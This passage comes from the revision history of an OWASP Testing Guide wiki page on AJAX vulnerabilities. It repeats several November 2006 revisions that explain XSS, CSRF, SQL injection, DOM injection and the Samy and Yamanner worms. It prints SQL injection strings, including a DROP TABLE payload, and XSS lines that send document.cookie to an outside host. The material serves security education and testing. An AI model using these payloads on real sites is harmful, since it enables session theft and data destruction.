* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing == 
[[AJAX How to test AoC - OWASP Testing Guide v2|4.9.2 How to test AJAX ]] 
[[AJAX Testing AoC - OWASP Testing Guide v2|4.9 AJAX Testing ]] 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:25:09Z

Anushshetty: /* Testing */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==

The Ajax testing details can be found at [[AJAX How to test AoC|4.9.2 How to test AJAX ]] 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:20:00Z

Anushshetty: /* Gray Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T08:39:06Z

Anushshetty: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
